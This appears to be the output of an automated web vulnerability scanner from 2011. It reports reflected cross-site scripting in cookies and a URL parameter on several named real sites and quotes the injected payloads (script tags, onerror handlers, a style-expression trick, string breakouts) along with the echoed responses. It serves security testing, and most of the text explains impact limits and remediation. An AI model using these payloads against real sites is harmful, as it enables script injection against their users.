This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
The value of the ar_p82806590 cookie is copied into the HTML document as plain text between tags. The payload 420e0<script>alert(1)</script>ff7475b6bfb was submitted in the ar_p82806590 cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
The value of the ar_p90175839 cookie is copied into the HTML document as plain text between tags. The payload 96c3f<script>alert(1)</script>1746236b837 was submitted in the ar_p90175839 cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ea446"style%3d"x%3aexpression(alert(1))"7da7137150 was submitted in the REST URL parameter 1. This input was echoed as ea446"style="x:expression(alert(1))"7da7137150 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.
HTTP/1.1 302 Found Date: Wed, 05 Oct 2011 18:03:20 GMT Server: Apache/1.3.6 (Unix) Location: http://www.bu.edu/htbin/webph/query.pl?search_for=favicon.icoea446"style="x:expression(alert(1))"7da7137150 Content-Type: text/html Content-Length: 287
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <HTML><HEAD> <TITLE>302 Found</TITLE> </HEAD><BODY> <H1>Found</H1> The document has moved <A HREF="http://www.bu.edu/htbin/webph/query.pl?search_for=favicon.icoea446"style="x:expression(alert(1))"7da7137150"> ...[SNIP]...
The value of the skimGUID cookie is copied into the HTML document as plain text between tags. The payload 99c8e<img%20src%3da%20onerror%3dalert(1)>ab5be0cfbcd was submitted in the skimGUID cookie. This input was echoed as 99c8e<img src=a onerror=alert(1)>ab5be0cfbcd in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
The value of the IP cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload edcb1"%3balert(1)//791f9033987 was submitted in the IP cookie. This input was echoed as edcb1";alert(1)//791f9033987 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Connection: close Date: Wed, 05 Oct 2011 21:03:05 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET P3P: policyref="/w3c/p3pEXTRA.xml", CP="NOI DSP COR NID ADM DEV PSA OUR IND UNI PUR COM NAV INT STA" Content-Length: 7286 Content-Type: application/x-javascript Expires: Wed, 05 Oct 2011 21:13:05 GMT Cache-control: private
// Copyright (c)2006 Site Meter, Inc. // <![CDATA[ var SiteMeter = { init:function( sCodeName, sServerName, sSecurityCode ) { SiteMeter.CodeName = sCodeName; SiteMeter.ServerName = sServerName; SiteMeter.SecurityCode = sSecurityCode; SiteMeter.IP = "50.23.123.106edcb1";alert(1)//791f9033987"; SiteMeter.trackingImage = new Image(); SiteMeter.dgOutlinkImage = new Image();
if (typeof(g_sLastCodeName) != 'undefined') if (g_sLastCodeName == sCodeName) return;
The value of the IP cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ae6d4"%3balert(1)//0cb774f4acc was submitted in the IP cookie. This input was echoed as ae6d4";alert(1)//0cb774f4acc in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Connection: close Date: Wed, 05 Oct 2011 20:46:08 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET P3P: policyref="/w3c/p3pEXTRA.xml", CP="NOI DSP COR NID ADM DEV PSA OUR IND UNI PUR COM NAV INT STA" Content-Length: 7286 Content-Type: application/x-javascript Expires: Wed, 05 Oct 2011 20:56:08 GMT Cache-control: private
// Copyright (c)2006 Site Meter, Inc. // <![CDATA[ var SiteMeter = { init:function( sCodeName, sServerName, sSecurityCode ) { SiteMeter.CodeName = sCodeName; SiteMeter.ServerName = sServerName; SiteMeter.SecurityCode = sSecurityCode; SiteMeter.IP = "50.23.123.106ae6d4";alert(1)//0cb774f4acc"; SiteMeter.trackingImage = new Image(); SiteMeter.dgOutlinkImage = new Image();
if (typeof(g_sLastCodeName) != 'undefined') if (g_sLastCodeName == sCodeName) return;
The value of the s_vi cookie is copied into the HTML document as plain text between tags. The payload 265fd<script>alert(1)</script>d8b0ee8a6 was submitted in the s_vi cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
The value of the weblogin3 cookie is copied into the HTML document as plain text between tags. The payload c61c8<script>alert(1)</script>c18c15d09d was submitted in the weblogin3 cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en-US"><head><title>[LOOP] Get New authref Error</title> </head><body><FONT color="#CC ...[SNIP]... <p>Could not look up (cussp-srv4c61c8<script>alert(1)</script>c18c15d09d)</p> ...[SNIP]...
The value of the weblogin3 cookie is copied into the HTML document as plain text between tags. The payload 7ef9e<script>alert(1)</script>94789dc5fec was submitted in the weblogin3 cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en-US"><head><title>[LOOP] Error</title> </head><body><FONT color="#CC0000"><b><p>Could not look up (cussp-srv47ef9e<script>alert(1)</script>94789dc5fec)<br> ...[SNIP]...
The value of the weblogin3 cookie is copied into the HTML document as plain text between tags. The payload b13b7<script>alert(1)</script>964c9f2ec7e was submitted in the weblogin3 cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
The value of the pers_cookie_insert_nbc_blogs_80 cookie is copied into the HTML document as plain text between tags. The payload 80d5f<script>alert(1)</script>1c1d0cefad1 was submitted in the pers_cookie_insert_nbc_blogs_80 cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
The value of the YII_CSRF_TOKEN cookie is copied into the HTML document as plain text between tags. The payload f7c29<img%20src%3da%20onerror%3dalert(1)>e30c24bd948 was submitted in the YII_CSRF_TOKEN cookie. This input was echoed as f7c29<img src=a onerror=alert(1)>e30c24bd948 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
The value of the HAPSID cookie is copied into the HTML document as plain text between tags. The payload a4b1d<script>alert(1)</script>a0b6051d1dc was submitted in the HAPSID cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
The value of the HAPSID cookie is copied into the HTML document as plain text between tags. The payload c4859<script>alert(1)</script>7a71a87be5f was submitted in the HAPSID cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
The value of the HAPSID cookie is copied into the HTML document as plain text between tags. The payload 89657<script>alert(1)</script>306c311062c was submitted in the HAPSID cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
The value of the HAPSID cookie is copied into the HTML document as plain text between tags. The payload ad771<script>alert(1)</script>41a75939c03 was submitted in the HAPSID cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.